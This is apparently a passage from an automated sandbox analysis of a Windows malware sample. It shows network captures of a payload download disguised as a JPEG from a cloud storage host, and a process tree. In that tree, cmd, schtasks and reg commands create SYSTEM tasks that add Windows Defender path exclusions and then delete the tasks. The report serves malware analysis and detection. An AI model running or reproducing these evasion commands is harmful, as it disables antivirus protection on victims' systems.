2025-01-01 07:31:29 UTC	4096	IN	Data Raw: 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 ed Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50017	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:41 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:41 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:41 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 6774EF5D07D4B9343318A962 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 7
2025-01-01 07:31:41 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5 Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5 Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20 Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d Data Ascii: jebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
2025-01-01 07:31:41 UTC	4096	IN	Data Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2

Target ID:	0
Start time:	02:29:50
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\0000000000000000.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0000000000000000.exe"
Imagebase:	0x140000000
File size:	31'322'802 bytes
MD5 hash:	4082E7B105C3E8ADFA454F1B09890A2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:30:55
Start date:	01/01/2025
Path:	C:\Users\user\Documents\qWXt7a.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\qWXt7a.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:30:57
Start date:	01/01/2025
Path:	C:\Users\user\Documents\qWXt7a.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\qWXt7a.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:31:07
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:31:07
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:31:07
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6ecb50000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:31:08
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6ecb50000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:31:09
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
